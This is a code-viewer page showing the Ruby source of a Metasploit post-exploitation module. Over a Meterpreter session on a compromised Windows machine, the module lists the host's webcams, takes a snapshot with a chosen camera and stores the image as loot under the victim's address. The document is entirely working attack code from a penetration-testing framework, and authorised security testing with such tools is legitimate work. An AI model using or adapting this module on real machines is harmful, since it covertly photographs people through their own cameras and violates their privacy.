Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/webcam.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Auxiliary::Report
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Windows Manage Webcam',
14
'Description' => %q{
15
This module will allow the user to detect installed webcams (with
16
the LIST action) or take a snapshot (with the SNAPSHOT) action.
17
},
18
'License' => MSF_LICENSE,
19
'Author' => [ 'sinn3r'],
20
'Platform' => [ 'win'],
21
'SessionTypes' => [ 'meterpreter' ],
22
'Actions' => [
23
[ 'LIST', { 'Description' => 'Show a list of webcams' } ],
24
[ 'SNAPSHOT', { 'Description' => 'Take a snapshot with the webcam' } ]
25
],
26
'DefaultAction' => 'LIST',
27
'Compat' => {
28
'Meterpreter' => {
29
'Commands' => %w[
30
stdapi_webcam_*
31
]
32
}
33
},
34
'Notes' => {
35
'Stability' => [CRASH_SAFE],
36
'SideEffects' => [PHYSICAL_EFFECTS],
37
'Reliability' => []
38
}
39
)
40
)
41
42
register_options(
43
[
44
OptInt.new('INDEX', [false, 'The index of the webcam to use', 1]),
45
OptInt.new('QUALITY', [false, 'The JPEG image quality', 50])
46
]
47
)
48
end
49
50
def run
51
if client.nil?
52
print_error("Invalid session ID selected. Make sure the host isn't dead.")
53
return
54
end
55
56
if !action
57
print_error('Invalid action')
58
return
59
end
60
61
case action.name
62
when /^list$/i
63
list_webcams(show: true)
64
when /^snapshot$/i
65
snapshot
66
end
67
end
68
69
def rhost
70
client.sock.peerhost
71
end
72
73
def snapshot
74
webcams = list_webcams
75
76
if webcams.empty?
77
print_error("#{rhost} - No webcams found")
78
return
79
end
80
81
if !(webcams[datastore['INDEX'] - 1])
82
print_error("#{rhost} - No such index: #{datastore['INDEX']}")
83
return
84
end
85
86
buf = nil
87
88
begin
89
print_status("#{rhost} - Starting...")
90
client.webcam.webcam_start(datastore['INDEX'])
91
92
buf = client.webcam.webcam_get_frame(datastore['QUALITY'])
93
if buf
94
print_status("#{rhost} - Got frame")
95
96
p = store_loot(
97
"#{rhost}.webcam.snapshot",
98
'application/octet-stream',
99
rhost,
100
buf,
101
"#{rhost}_snapshot.jpg",
102
"#{rhost} Webcam Snapshot"
103
)
104
105
print_good("#{rhost} - Snapshot saved: #{p}")
106
end
107
108
client.webcam.webcam_stop
109
print_status("#{rhost} - Stopped")
110
rescue Rex::Post::Meterpreter::RequestError => e
111
print_error(e.message)
112
return
113
end
114
end
115
116
def list_webcams(show: false)
117
begin
118
webcams = client.webcam.webcam_list
119
rescue Rex::Post::Meterpreter::RequestError
120
webcams = []
121
end
122
123
if show
124
tbl = Rex::Text::Table.new(
125
'Header' => 'Webcam List',
126
'Indent' => 1,
127
'Columns' => ['Index', 'Name']
128
)
129
130
webcams.each_with_index do |name, indx|
131
tbl << [(indx + 1).to_s, name]
132
end
133
134
print_line(tbl.to_s)
135
end
136
137
return webcams
138
end
139
end
140
141